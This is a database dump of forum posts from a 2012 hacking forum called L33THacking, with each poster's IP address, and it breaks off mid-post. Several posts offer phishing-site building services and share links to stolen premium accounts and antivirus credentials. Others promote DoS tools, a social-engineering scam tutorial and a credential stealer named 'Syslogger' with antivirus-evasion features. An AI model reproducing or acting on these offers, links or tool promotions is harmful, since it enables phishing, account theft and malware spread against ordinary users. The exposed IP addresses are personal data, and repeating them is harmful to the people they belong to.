VALUES('1528', '298', '1383', '9', 'RE: ???[EASY] LH\'s #1 WAY TO EARN MONEY GUARANTEED [EASY]???', '0', '166', '2112', '1346717927', 'Would love to see this method if the user comes online again. Thank you.', '108.220.98.220', '1826382556', '0', '0', '0', '0', '1', '4641352c68b8d0f1d7be6420bc0a8341', '0', '0'); INSERT INTO mybb_posts VALUES('1529', '322', '1503', '34', 'RE: Signature Tutorial', '0', '166', '2112', '1346718131', 'These tutorials are as easy as they come. Thanks for this.', '108.220.98.220', '1826382556', '0', '0', '0', '0', '1', '0285eb44d37d999f86374dd0e938856c', '0', '0'); INSERT INTO mybb_posts VALUES('1530', '316', '1480', '4', 'RE: Hello everyone.', '0', '82', 'iTzIpod', '1346718271', 'Oh. You changed your name. I thought you were a different member that was new. :p But you\'re still new xD', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ccdd295f5d26e591371d46a024bf05fb', '0', '0'); INSERT INTO mybb_posts VALUES('1531', '322', '1529', '34', 'RE: Signature Tutorial', '0', '82', 'iTzIpod', '1346718534', '[quote=\'2112\' pid=\'1529\' dateline=\'1346718131\']\r\nThese tutorials are as easy as they come. Thanks for this.\r\n[/quote]\r\n\r\nNo problem. Thanks for viewing my threads. =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '15c085c35d1e2f9b88073af2f69f6689', '0', '0'); INSERT INTO mybb_posts VALUES('1532', '327', '0', '5', 'Staff Notice in threads', '0', '1', 't3h jok3r', '1346718727', 'When you guys edit someone elses thread and want to put a warning, then what I would recommend you to do is to use the mycode below and put up your notice.\n\n[code]\n[mod]MESSAGE[/mod]\n[/code]\n\n[b][u]Preview[/u][/b]\n\n[mod]Message[/mod]\n\n[u][b]Example of how to use in thread\n[/b][/u]\n[mod]This link has been removed, because this download contains a virus. -Staff[/mod]\n\nP.S: There should be no space between the code and the message.\n\n[b]EXAMPLE[/b]\n\nIt should be like this\n\n[code]\n[mod]This is an example[/mod]\n[/code]\n\nNot like\n\n[code]\n[mod] test [/mod]\n[/code]', '72.229.164.105', '1223009385', '1', '0', '1', '1347482933', '1', '657511ec72c87c435f40f4508ac5166b', '0', '1347482933'); INSERT INTO mybb_posts VALUES('1533', '328', '0', '48', 'Mod Notice in threads', '0', '1', 't3h jok3r', '1346718764', 'When you guys edit someone elses thread and want to put a warning, then what I would recommend you to do is to use the mycode below and put up your notice.\n\n[code]\n[mod]MESSAGE[/mod]\n[/code]\n\n[b][u]Preview[/u][/b]\n\n[mod]Message[/mod]\n\n[u][b]Example of how to use in thread\n[/b][/u]\n[mod]This link has been removed, because this download contains a virus. -Staff[/mod]\n\n\nP.S: There should be no space between the code and the message.\n\n[b]EXAMPLE[/b]\n\nIt should be like this\n\n[code]\n[mod]This is an example[/mod]\n[/code]\n\nNot like\n\n[code]\n[mod] test [/mod]\n[/code]', '72.229.164.105', '1223009385', '1', '0', '1', '1347482924', '1', 'eab696efa68259fdcfa3a7c8bd56546f', '0', '1347482924'); INSERT INTO mybb_posts VALUES('1534', '316', '1480', '4', 'RE: Hello everyone.', '0', '1', 't3h jok3r', '1346718817', 'Welcome to L33THacking.\n\nI also thought you were another new member.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '80b2742194a1376defcd7e26a1cd46d6', '0', '0'); INSERT INTO mybb_posts VALUES('1535', '127', '1524', '46', 'RE: Will make you a phisher website with theme you request.', '0', '1', 't3h jok3r', '1346725101', '[quote=\'iTzIpod\' pid=\'1524\' dateline=\'1346717467\']\r\nI don\'t think this user is active anymore.\r\n[/quote]\r\n\r\nThen close down the thread???', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', 'f60e35a334cf3afb0659ddf7d6d68716', '0', '0'); INSERT INTO mybb_posts VALUES('1536', '329', '0', '46', 'New phi$hing theme service', '0', '17', 'khade009', '1346725132', 'Recently vladjkes phi$hing theme service got shut down due to inactivity so I opened up my own theme service. Post below and PM me the site. \r\n\r\nI will not phi$h sites like google, youtube, facebook etc.', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', '25a41029092f126464f277258f95bde8', '0', '0'); INSERT INTO mybb_posts VALUES('1537', '318', '1494', '9', 'RE: Want to Earn Money by doing Nothing ?', '0', '84', 'Thunder™', '1346735134', '[quote=\'iTzIpod\' pid=\'1494\' dateline=\'1346696391\']\r\nI don\'t get it.. How do I register an account and start gambling me some money? O_o\r\n\r\nEDIT: Nevermind. So I made a Reserve Liberty account and now I want to start gambling some money.. But I don\'t have money on my account so I can\'r gamble. -_-\r\nWhat do I do?\r\n[/quote]\r\n\r\nU can Earn it or if u have money in paypal u can exchange it.', '111.91.75.137', '1868254089', '0', '0', '0', '0', '1', 'c95ccea509bf729db195b17abc07cb56', '0', '0'); INSERT INTO mybb_posts VALUES('1538', '328', '1533', '48', 'RE: Mod Notice in threads', '0', '82', 'iTzIpod', '1346759627', 'Seems cool. I will try it out soon.\n\n\nTest:\n\n[mod]Le Testing [/mod]', '24.212.197.164', '416597412', '1', '0', '82', '1346794678', '1', '37de5031e41a3163d1227b8220ad00f4', '0', '1346794678'); INSERT INTO mybb_posts VALUES('1539', '327', '1532', '5', 'RE: Staff Notice in threads', '0', '2', 'Apathy', '1346763908', 'Righty o. Will do.', '173.206.177.61', '-1378963139', '0', '0', '0', '0', '1', 'a334afbb939d26e6f559616d56ff0dc9', '0', '0'); INSERT INTO mybb_posts VALUES('1540', '327', '1532', '5', 'RE: Staff Notice in threads', '0', '1', 't3h jok3r', '1346764374', 'Low Quality Posts [b]NOT[/b] allowed.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', 'a61e2346ebfdd82102e7cacbe92dc606', '0', '0'); INSERT INTO mybb_posts VALUES('1541', '329', '1536', '46', 'RE: New phi$hing theme service', '0', '53', 'sirchamp', '1346764446', 'I cant pm you......Please fix that thanks', '188.155.56.90', '-1130678182', '1', '0', '53', '1346764546', '1', '1f4160cc984804c9580f3448e3813698', '0', '1346764546'); INSERT INTO mybb_posts VALUES('1542', '212', '1487', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '1', 't3h jok3r', '1346765744', '[quote=\'iTzIpod\' pid=\'1487\' dateline=\'1346691089\']\r\n[quote=\'t3h jok3r\' pid=\'1450\' dateline=\'1346642117\']\r\nSo far, only the Unique group was added. Other group ideas were overlooked. \r\n\r\nMr. Omni\'s group suggestion was declined because their userbar wasn\'t attractive and I found out that they won\'t be active on LH because of their own website.\r\n[/quote]\r\n\r\nOh alright. Thanks for making Unique Official! :D\r\n[/quote]\r\n\r\nNo problem. Enjoy and hopefully this group can help L33THacking become a successful site.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '8bd4a6c368993a0410926243b3f75bda', '0', '0'); INSERT INTO mybb_posts VALUES('1543', '281', '1335', '84', 'RE: Upload N Sell Exploit', '0', '53', 'sirchamp', '1346766658', 'Same by me bchkhackforums something XBL theres some key in it', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '3ec5bd48500de848bc0694ff4134be72', '0', '0'); INSERT INTO mybb_posts VALUES('1544', '330', '0', '7', 'Request Exchange', '0', '53', 'sirchamp', '1346767124', 'Hey guys I have a bit of money on paypal but I do not know any working exchange which exchanges from paypal to libertyreserve.\nI need someone wh0 pays me 50 cents to liberty reserve and I will pay him 60(!) cents to his paypal.\nSo you will make 10 cents :D\nI hope somebody can help me :thinking:\nOr does anyone know a working method to exchange money from paypal to liberty reserve??', '188.155.56.90', '-1130678182', '1', '0', '53', '1346772421', '1', 'cab58acea1a44e501b77ace74c24650d', '0', '1346772421'); INSERT INTO mybb_posts VALUES('1545', '331', '0', '5', 'New Rules and Instructions v.5', '0', '1', 't3h jok3r', '1346767410', 'I go around many forums and MyBB Support sites daily and pick up new ideas etc. So I thought why not post new rules and instructions on a single thread so it\'s easy for staff and admins to catch up. This thread will be updated every time there\'s a new rule or instruction on something. \n\n[hr]\n\nAll permanent banned members should be moved to the [b]closed[/b] group. Permanent bans include the following reasons.\n\n[list]\n[*] Proven Scammer\n[*] [bot] Spammer\n[*] Threat to L33THacking\n[*] Old inactive accounts\n[*] Stolen/Hack accounts\n[/list]\n\nDifference between banned and closed is that only temporary banned members should be moved to the banned group. People that we don\'t want to ever come back will be moved to the closed group. \n\n[hr]\n\n[b]Banning Multiple Accounts[/b]\n\nThe account with most reports or most LQ account should be moved to the closed group. The most HQ account must be banned for [b]6 months[/b].\n\nFor staff; If you guys want to report 2+ multi accounting, then PM me an Admin then what the admin should do is merge all the users to the most HQ user also ban the HQ multi accounter for 6 months.\n\nHow to merge users?\nhttp://l33thacking.com/showthread.php?tid=10\n\n\n[hr]\n\n[b]Edit Post Lock[/b]\n\nI have added a new plugin. After a Moderator edits a post, the original poster is no longer allowed to edit their post. \n\n[hr]\n\nNot really a rule or instruction but a great update that I have been working on for 3 weeks.\n\nWe now have SMTP Emailers. On account activations and email notifications users will receive an email from [b]staff@l33thacking.net[/b]\n\nIf they send an email from the contact page then it will be sent to [b]support@l33thacking.net[/b]\n\n[hr]\n\nMembers under 13 are not allowed. Members with parent/legal guardian permission will be added to a special group called \"Underage\".\n\n[hr]\n\n[b]Administrative Notes[/b]\n\nWhen giving a warning, there\'s a box which says \"administrative notes\". There you type in something that says why you gave them a warning. That can ONLY be viewed by the warning giver and Admins.\n\n[hr]\n\n[b]Thread action[/b]\n\nYou are [b]NOT[/b] allowed to delete threads, you should use the junk tool\n\n[hr]\n\n[b]Advertising[/b]\n\nIf someone advertises a COMPETING site through posts then give them a warning but if they are advertising through PMs then BAN them for 2 months.\n\n[hr]\n\n[b]Edit Rep[/b]\n\nStaff and Admins can now edit anyones rep.', '72.229.164.105', '1223009385', '1', '0', '1', '1350353569', '1', '0cf111496561375a46d92a4a5d22b939', '0', '1350353569'); INSERT INTO mybb_posts VALUES('2932', '604', '2928', '61', 'RE: Unique Sig and Header', '0', '3', '??????????¢™', '1348976074', 'Sounds good, I would have done it but I dont know how.', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', '6e7f6f2d2c7515d80beb3ea255883ab6', '0', '0'); INSERT INTO mybb_posts VALUES('2933', '603', '2922', '47', 'RE: Custom Pastebin Source Code', '0', '3', '??????????¢™', '1348976153', 'Thanks for letting me know, I have edited the post.', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', 'f479bc6c36045f27d2ca481391ddec17', '0', '0'); INSERT INTO mybb_posts VALUES('2934', '605', '0', '64', 'Dredd 3D (2012) Movie RIP', '0', '5', 'Timmy', '1348976519', '[align=center][img]http://media2.firstshowing.net/firstshowing/img4/DreddBurningFinalStancePosterfull4.jpg[/img][/align]\r\n\r\n[b]Description:[/b] \r\nIn a violent, futuristic city where the police have the authority to act as judge, jury and executioner, a cop teams with a trainee to take down a gang that deals the reality-altering drug, SLO-MO.\r\n\r\n[b]Public Rating:[/b] 7.8\r\n\r\n[u][b]Links[/b][/u]\r\n\r\n[url=http://www.embedder.eu/frame.php?url=http://www.sockshare.com/file/FD84F0E0F01EC1D4]Sockshare[/url]\r\n\r\n[url=http://vidgang.co/play/67a3df976c3f9e9811a182fae1a97f1d/]Vidgang[/url]\r\n\r\n[url=http://fleon.me/vv.php?Id=99efc42897cb95986895d5bac9906a82]Fleon[/url]\r\n\r\n[url=http://www.nowvideo.eu/video/4lgpjawtg1rtm]NowVideo[/url]\r\n\r\n[url=http://hqvideo.cc/stream/1cc50c023c3b1295/]HQvideo[/url]\r\n\r\nEnjoy!', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '6ba2375ee30ea34773a7c7a2d17c1f0f', '0', '0'); INSERT INTO mybb_posts VALUES('1546', '121', '302', '21', 'RE: kurosaki\'s DOS Tool', '0', '171', 'W33D', '1346767456', 'i tought this was a .exe application not a .php -.-', '67.68.224.95', '1128587359', '1', '0', '0', '0', '1', 'ee1ed7e2ed147e454726e9778fd41645', '0', '0'); INSERT INTO mybb_posts VALUES('1547', '25', '71', '19', 'RE: Blackhat System Scanner', '0', '171', 'W33D', '1346769255', 'TROJAN DROPPER\nVIRUS SCAN:\nhttps://www.virustotal.com/file/3218cc43734b6e54824108cc28f9181fbec53779a78f9bb95a794ef49463584b/analysis/', '67.68.224.95', '1128587359', '1', '0', '0', '0', '1', '450cf798e9fab6edbd943a8441be05ea', '0', '0'); INSERT INTO mybb_posts VALUES('1548', '191', '666', '15', 'RE: ProDos v1.0', '0', '171', 'W33D', '1346769353', 'LOL this thing is useless cant takedown shit even if u like 20 ppl attacking a site -.-', '67.68.224.95', '1128587359', '1', '0', '0', '0', '1', '4cca3dd8995fc2d0f6c6d0c9c60d534c', '0', '0'); INSERT INTO mybb_posts VALUES('1549', '332', '0', '4', 'Hello', '0', '172', 'MistaCode', '1346774569', 'Hey my name is MistaCode, well i got nothing much to say :D', '46.165.208.13', '782618637', '0', '0', '0', '0', '1', '8d2e9192d7ec2b2051f29e2a4f8afbad', '0', '0'); INSERT INTO mybb_posts VALUES('1550', '332', '1549', '4', 'RE: Hello', '0', '150', 'MinecraftGeek', '1346774596', 'Did you come from Nerd Chat?', '86.166.88.210', '1453742290', '0', '0', '0', '0', '1', '65466e673021cef39791d8a5b5369cca', '0', '0'); INSERT INTO mybb_posts VALUES('1551', '332', '1550', '4', 'RE: Hello', '0', '172', 'MistaCode', '1346774821', '[quote=\'MinecraftGeek\' pid=\'1550\' dateline=\'1346774596\']\r\nDid you come from Nerd Chat?\r\n[/quote]\r\n\r\nWell yeah im Trojan ;D', '88.193.83.195', '1489064899', '0', '0', '0', '0', '1', '4736c44e357453b684ef49732a28ee69', '0', '0'); INSERT INTO mybb_posts VALUES('1552', '332', '1551', '4', 'RE: Hello', '0', '150', 'MinecraftGeek', '1346774837', '[quote=\'MistaCode\' pid=\'1551\' dateline=\'1346774821\']\r\n[quote=\'MinecraftGeek\' pid=\'1550\' dateline=\'1346774596\']\r\nDid you come from Nerd Chat?\r\n[/quote]\r\n\r\nWell yeah im Trojan ;D\r\n[/quote]\r\n\r\nOk bro :D', '86.166.88.210', '1453742290', '0', '0', '0', '0', '1', '240e500767da1204411b0427f616cb5a', '0', '0'); INSERT INTO mybb_posts VALUES('1553', '212', '1542', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '82', 'iTzIpod', '1346786865', '[quote=\'t3h jok3r\' pid=\'1542\' dateline=\'1346765744\']\r\n[quote=\'iTzIpod\' pid=\'1487\' dateline=\'1346691089\']\r\n[quote=\'t3h jok3r\' pid=\'1450\' dateline=\'1346642117\']\r\nSo far, only the Unique group was added. Other group ideas were overlooked. \r\n\r\nMr. Omni\'s group suggestion was declined because their userbar wasn\'t attractive and I found out that they won\'t be active on LH because of their own website.\r\n[/quote]\r\n\r\nOh alright. Thanks for making Unique Official! :D\r\n[/quote]\r\n\r\nNo problem. Enjoy and hopefully this group can help L33THacking become a successful site.\r\n[/quote]\r\n\r\n\r\nHopefully it will =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f6d41c4d897a88f81d652e69293126e5', '0', '0'); INSERT INTO mybb_posts VALUES('1554', '332', '1549', '4', 'RE: Hello', '0', '82', 'iTzIpod', '1346786914', 'Welcome to LH! \nEnjoy your stay!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ac761f6b9edeb96eb9beeacbe03e30d3', '0', '0'); INSERT INTO mybb_posts VALUES('1555', '330', '1544', '7', 'RE: Request Exchange', '0', '82', 'iTzIpod', '1346788772', 'I need that too. -_-', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '02277646c6a7743fd3a8c84a566d8b80', '0', '0'); INSERT INTO mybb_posts VALUES('1556', '329', '1536', '46', 'RE: New phi$hing theme service', '0', '17', 'khade009', '1346789028', 'Sorry. I fixed it now. You can PM me now.', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', '65dd698acefbcda7f5a2e2c05681ca29', '0', '0'); INSERT INTO mybb_posts VALUES('1557', '328', '1533', '48', 'RE: Mod Notice in threads', '0', '61', 'NXK', '1346789285', '[mod]This is cool, I can\'t wait to try this out![/mod]', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '7867043be1a53572245c3f495963ea8a', '0', '0'); INSERT INTO mybb_posts VALUES('1558', '331', '1545', '5', 'RE: New Rules and Instructions v.1', '0', '2', 'Apathy', '1346789286', 'Thanks for the info. I think you should only close account if they actually go throu with the threats.', '173.206.129.10', '-1378975478', '0', '0', '0', '0', '1', '46a20c98fdcb68197ec0084e9fe427b5', '0', '0'); INSERT INTO mybb_posts VALUES('1559', '317', '1489', '61', 'RE: Unique\'s Purpose', '0', '82', 'iTzIpod', '1346793290', '@HoverCatz, yes =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2a6771a7b269af7246d4c77b754b5801', '0', '0'); INSERT INTO mybb_posts VALUES('1560', '328', '1533', '48', 'RE: Mod Notice in threads', '0', '1', 't3h jok3r', '1346795213', 'lol Enjoy.\n\nAlso, just to let you know only Mods, Staff and Admins can use this mycode.', '173.245.64.111', '-1376436113', '1', '0', '0', '0', '1', '63c8d05a58a79d30d5ed2a84471b1ff4', '0', '0'); INSERT INTO mybb_posts VALUES('1561', '266', '1186', '47', 'RE: Win a Free Netflix Account~', '0', '160', 'Jacob', '1346795535', 'Oh Okay. I will apply again when I get them.', '142.255.31.241', '-1895882767', '0', '0', '0', '0', '1', '463656c1ce5056a29e528e1f5bdbc5fd', '0', '0'); INSERT INTO mybb_posts VALUES('1562', '331', '1558', '5', 'RE: New Rules and Instructions v.1', '0', '1', 't3h jok3r', '1346796013', '[quote=\'Apathy\' pid=\'1558\' dateline=\'1346789286\']\r\nThanks for the info. I think you should only close account if they actually go throu with the threats.\r\n[/quote]\r\n\r\nWell no because we can\'t allow scammers, if we ban scammers they will come back after their ban has expired and scam again and we can\'t let scammers take over LH.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '022287e52d56bf1d2597016d91eecdb6', '0', '0'); INSERT INTO mybb_posts VALUES('1563', '332', '1549', '4', 'RE: Hello', '0', '1', 't3h jok3r', '1346796279', 'Welcome to L33THacking Trojan/Mistacode.\n\nSince you have come from nerdchat, I have upgraded your account for free.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '08bcbd96e7fe05d101e78518bcfe12c5', '0', '0'); INSERT INTO mybb_posts VALUES('1564', '330', '1544', '7', 'RE: Request Exchange', '0', '1', 't3h jok3r', '1346796380', 'Unfortunately, Marketplace has been removed but we still do allow exchanges at your own risk.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '451495300d28f4e21a267b00e4282278', '0', '0'); INSERT INTO mybb_posts VALUES('1565', '333', '0', '42', 'Six Degrees Made For Adult Students', '0', '7', 'Romdu62', '1346796544', 'Degree #1 - Master\'s in Business Administration\r\nDegree #2 - Master\'s in Health Services Administration\r\nDegree #3 - Bachelor\'s in Psychology\r\nDegree #4 - Bachelor\'s in Computer Science\r\nDegree #5 - Bachelor\'s in Education\r\nDegree #6 - Bachelor\'s in Human Resources', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', '8a1aa87b4f0ca82fe826a5a341b65558', '0', '0'); INSERT INTO mybb_posts VALUES('1566', '331', '1562', '5', 'RE: New Rules and Instructions v.1', '0', '2', 'Apathy', '1346796638', '[quote=\'t3h jok3r\' pid=\'1562\' dateline=\'1346796013\']\r\n[quote=\'Apathy\' pid=\'1558\' dateline=\'1346789286\']\r\nThanks for the info. I think you should only close account if they actually go throu with the threats.\r\n[/quote]\r\n\r\nWell no because we can\'t allow scammers, if we ban scammers they will come back after their ban has expired and scam again and we can\'t let scammers take over LH.\r\n[/quote]\r\n\r\nI was not talking about scammers I was talking about if they make threats against the site. If they actually do somethin I think then we should perm ban them. People make alot of empty threats that is why I am saying this.', '173.206.129.10', '-1378975478', '0', '0', '0', '0', '1', '45bff3e3079f192679d5352ed68f4a80', '0', '0'); INSERT INTO mybb_posts VALUES('1567', '331', '1566', '5', 'RE: New Rules and Instructions v.1', '0', '1', 't3h jok3r', '1346796745', '[quote=\'Apathy\' pid=\'1566\' dateline=\'1346796638\']\r\n[quote=\'t3h jok3r\' pid=\'1562\' dateline=\'1346796013\']\r\n[quote=\'Apathy\' pid=\'1558\' dateline=\'1346789286\']\r\nThanks for the info. I think you should only close account if they actually go throu with the threats.\r\n[/quote]\r\n\r\nWell no because we can\'t allow scammers, if we ban scammers they will come back after their ban has expired and scam again and we can\'t let scammers take over LH.\r\n[/quote]\r\n\r\nI was not talking about scammers I was talking about if they make threats against the site. If they actually do somethin I think then we should perm ban them. People make alot of empty threats that is why I am saying this.\r\n[/quote]\r\n\r\nCould you elaborate what you are talking about?', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '98a618fe14f8492671492c9cfa64040d', '0', '0'); INSERT INTO mybb_posts VALUES('1568', '326', '1520', '16', 'RE: [TUT] Free Restaurant Gift Cards.', '0', '61', 'NXK', '1346796939', 'Seems legit.\n\nI\'m going to try this right now actually. One thing I havent thought about trying to S.E.\nThanks.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', 'aa78a6ae74f9c65c50266b634516c1f3', '0', '0'); INSERT INTO mybb_posts VALUES('1569', '252', '1089', '54', 'RE: August 27, 2012 XXXX Accounts', '0', '1', 't3h jok3r', '1346797545', 'Enjoy and good luck not getting caught lol ;)', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', 'c9fb4311b285f80831aba4f3d3f5f3e2', '0', '0'); INSERT INTO mybb_posts VALUES('1570', '334', '0', '54', '[Brazzers/Mofos/Hustler/Naughtyamerica...// Sept-05-12]', '0', '1', 't3h jok3r', '1346797616', '[align=center]BRAZZERS 24X PREMIUM ACCOUNT: [u][url=http://www.filedownloads.org/fjoenho3sail]DOWNLOAD BOX[/url][/u]\r\n\r\nMOFOS 29X PREMIUM ACCOUNT: [u][url=http://www.filedownloads.org/o67zpqai78u5]DOWNLOAD BOX[/url][/u]\r\n\r\nTWISTYS 27X PREMIUM ACCOUNT: [u][url=http://www.filedownloads.org/8i3wjatrzoqk]DOWNLOAD BOX[/url][/u] \r\n\r\nHUSTLER 26X PREMIUM ACCOUNT: [u][url=http://www.filedownloads.org/kvhag1129sqy]DOWNLOAD BOX[/url][/u]\r\n\r\nNAUGHTY AMERICA 26X PREMIUM ACCOUNT: [u][url=http://www.filedownloads.org/2eu51tkoougp]DOWNLOAD BOX[/url][/u]G][/align]', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', 'd243c3ce9c3ab1f85a17a9bdb3a56e1e', '0', '0'); INSERT INTO mybb_posts VALUES('1571', '116', '294', '43', 'RE: [tut] Creating a Kindle PID', '0', '5', 'Timmy', '1346797731', 'Thanks this is very useful tutorial.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '7246464149a8403eba3b285f1f037d0c', '0', '0'); INSERT INTO mybb_posts VALUES('1572', '331', '1545', '5', 'RE: New Rules and Instructions v.1', '0', '2', 'Apathy', '1346797918', '[quote]\n\nAll permanent banned members should be moved to the closed group. Permanent bans include the following reasons.\nProven Scammer\n[bot] Spammer\nThreat to L33THacking\nOld inactive accounts\nStolen/Hack accounts\n[/quote]\n\nThat.', '173.206.129.10', '-1378975478', '0', '0', '0', '0', '1', 'b55744cb218ed913eb6f7ded9bfc58ed', '0', '0'); INSERT INTO mybb_posts VALUES('1573', '323', '1505', '7', 'RE: If I go inactive', '0', '1', 't3h jok3r', '1346797986', 'Oh OK iTzIpod then good luck with school and hopefully you will continue contributing even though it will be less but even 1 post daily will help LH a lot and also it\'s OK if you can\'t come online everyday.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '2c5f4b2145215d3a80a7ab3f709e9080', '0', '0'); INSERT INTO mybb_posts VALUES('1574', '25', '71', '19', '[Junk]Blackhat System Scanner', '0', '1', 't3h jok3r', '1346798045', 'This thread has been junked.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('1575', '335', '0', '25', 'ESET NOD32 Antivirus & ESET Smart Security Username And Password 4 sept 2012', '0', '5', 'Timmy', '1346798084', 'http://adf.ly/CZBBJ\r\n\r\nEnjoy!', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '850a3ce1ca2aa64fda1564af9a752c14', '0', '0'); INSERT INTO mybb_posts VALUES('1576', '302', '1484', '53', 'RE: Java DoS Script', '0', '5', 'Timmy', '1346798152', '[quote=\'HoverCatz\' pid=\'1484\' dateline=\'1346658527\']\r\nWhy do you share code when you dont know what it does?\r\nThe code i quoted will execute if you attack \"website.org\", and it will make your cpu go to 100%.\r\n[/quote]\r\n\r\n[b]Why do you share code when you dont know what it does?[/b]\r\n\r\nLMAO. Good Going HoverCatz', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '9fe7110fca61541b69a15098d93355d6', '0', '0'); INSERT INTO mybb_posts VALUES('1577', '302', '1484', '53', 'RE: Java DoS Script', '0', '4', 'Triple H', '1346798238', '[quote=\'HoverCatz\' pid=\'1484\' dateline=\'1346658527\']\r\nWhy do you share code when you dont know what it does?\r\nThe code i quoted will execute if you attack \"website.org\", and it will make your cpu go to 100%.\r\n[/quote]\r\n\r\nI was trying to contribute. Does this script work or not?', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', 'f375732be573d96c7681badc2671e129', '0', '0'); INSERT INTO mybb_posts VALUES('1578', '331', '1572', '5', 'RE: New Rules and Instructions v.1', '0', '1', 't3h jok3r', '1346798430', '[quote=\'Apathy\' pid=\'1572\' dateline=\'1346797918\']\r\n[quote]\r\n\r\nAll permanent banned members should be moved to the closed group. Permanent bans include the following reasons.\r\nProven Scammer\r\n[bot] Spammer\r\nThreat to L33THacking\r\nOld inactive accounts\r\nStolen/Hack accounts\r\n[/quote]\r\n\r\nThat.\r\n[/quote]\r\n\r\nI had to read it twice but finally I got it. I understand what you mean. We would obviously close down people with real threats and people that have a big mouth and no guts should be banned.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', 'b6bd9b30e536a087a4ae1aecb6a6e5b0', '0', '0'); INSERT INTO mybb_posts VALUES('1579', '323', '1505', '7', 'RE: If I go inactive', '0', '82', 'iTzIpod', '1346800223', 'Well I got no homework today considering it\'s the first day of school. But I still gotta sleep early.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e48b43e4981ac55cfc20ab235408f799', '0', '0'); INSERT INTO mybb_posts VALUES('1580', '326', '1520', '16', 'RE: [TUT] Free Restaurant Gift Cards.', '0', '166', '2112', '1346801069', 'It\'s honestly a really easy SE, you just need to be convincing in that matter.', '108.220.98.220', '1826382556', '0', '0', '0', '0', '1', '656833a7f5418dd7375e626a3f832dba', '0', '0'); INSERT INTO mybb_posts VALUES('1581', '323', '1505', '7', 'RE: If I go inactive', '0', '1', 't3h jok3r', '1346801116', 'I can understand, we have some cool updates coming up for LH.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', 'c02214e3bfe41b0f5f3b4f8fe81a1147', '0', '0'); INSERT INTO mybb_posts VALUES('1582', '323', '1581', '7', 'RE: If I go inactive', '0', '82', 'iTzIpod', '1346801158', '[quote=\'t3h jok3r\' pid=\'1581\' dateline=\'1346801116\']\r\nI can understand, we have some cool updates coming up for LH.\r\n[/quote]\r\n\r\nMind PMing me some info or spoilers?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a43650700eb665b384404bbe2ef3c895', '0', '0'); INSERT INTO mybb_posts VALUES('1583', '252', '1089', '54', 'RE: August 27, 2012 XXXX Accounts', '0', '166', '2112', '1346801363', 'None of the mofos seemed to have worked. Bummed.', '108.220.98.220', '1826382556', '0', '0', '0', '0', '1', 'e42150ffe25d62f89175edc68e00d6ec', '0', '0'); INSERT INTO mybb_posts VALUES('1584', '318', '1493', '9', 'RE: Want to Earn Money by doing Nothing ?', '0', '82', 'iTzIpod', '1346801505', 'How do I exchange it? I can\'t seem to figure it out :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '83c9d6bf643203c3cdb1cc7b77890d4b', '0', '0'); INSERT INTO mybb_posts VALUES('1585', '318', '1584', '9', 'RE: Want to Earn Money by doing Nothing ?', '0', '166', '2112', '1346801717', '[quote=\'iTzIpod\' pid=\'1584\' dateline=\'1346801505\']\nHow do I exchange it? I can\'t seem to figure it out :/\n[/quote]\n\nFind a trusted exchanger. Such as anyone from Hf, there\'s a currency forum, and people are allowed to exchange their paypaI for Liberty Reserve.', '108.220.98.220', '1826382556', '0', '0', '166', '1346801728', '1', '1d90ace93da7fd6e858bdef19c71cd5a', '0', '1346801728'); INSERT INTO mybb_posts VALUES('1586', '336', '0', '7', 'Hope my work pays off', '0', '82', 'iTzIpod', '1346802503', '[img]http://i.imgur.com/WTIvS.png[/img]\n\nI was advertising L33thacking.com\n\n\nAnd hopefully they register, or register under my referral! :D\n\n\n@t3h jok3r\n\n\nEDIT: Also, @t3h jok3r, I made $17 today day (Tuesday) :D', '24.212.197.164', '416597412', '1', '0', '82', '1346802780', '1', '3bc285b4118c9783d738b4931e5c696d', '0', '1346802780'); INSERT INTO mybb_posts VALUES('1587', '337', '0', '15', '[HOT] Syslogger LATEST VERSION [HOT]', '2', '171', 'W33D', '1346806276', '[align=center][img]http://1.bp.blogspot.com/-qhRwyJiktiw/T_h-xrp4_8I/AAAAAAAAAa8/3tFEygx5hSQ/s400/kbAp6.png[/img]\n\n[img]http://i.imgur.com/zz5G9.png[/img]\n\nAntis\n[x] AntiAnubis\n[x] AntiBitdefender\n[x] AntiKaspersky\n[x] AntiMalwarebytes\n[x] AntiNod32\n[x] AntiNorman\n[x] AntiOllydbg\n[x] AntiOutpost\n[x] AntiWireshark\nStealers\n[x] Google Chrome (latest version)\n[x] Mozilla Firefox (latest version)\n[x] Opera (version 10)\n[x] Windows Live Messenger (latest 